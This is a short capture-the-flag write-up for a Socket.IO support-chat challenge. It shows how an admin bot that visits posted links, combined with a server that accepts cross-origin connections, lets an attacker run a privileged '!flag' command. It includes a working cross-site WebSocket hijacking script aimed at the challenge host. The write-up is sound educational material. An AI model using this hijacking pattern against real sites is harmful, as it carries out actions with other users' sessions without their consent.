Tags: socket.io csrf web 

Rating:

First, we can register with any username/password combo.

Then, we are presented with a chatbot:

```text
Bot: Welcome to the support chat! An admin will be assisting you.
```

If we look at the source code of the site, we find that it is based on Socket.IO.

Trying to impersonate another user (by changing the `room` that is sent to the server) does not work since it looks like the server validates our cookie before it lets us join.

Now, let's try enumerate the things that the chatbot lets us do

We try to spam some random things:
```text
User: random
Admin: Sorry, I can't help you if you don't provide context. Where is the error happening?
```

We also notice that there is a `!flag` command:

```text
User: !flag
Bot: Only the admin can run that command from our office
```

This implies that part of the vulnerability will involve some kind of XSS or CSRF.

After trying a few random guesses, we notice that putting a link in causes the admin to try to visit that link:
```text
User: https://example.com
Admin: I am looking into https://example.com give me a moment...
```

Thus, the vulnerability is probably something to do with CSRF.

We can try just connecting to the Socket.IO server from another origin, which does work.

So now all we need to do is to host a script that runs `!flag`:
```
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>
```

After giving the admin the URL, we see the flag magically come back to us in the chatroom.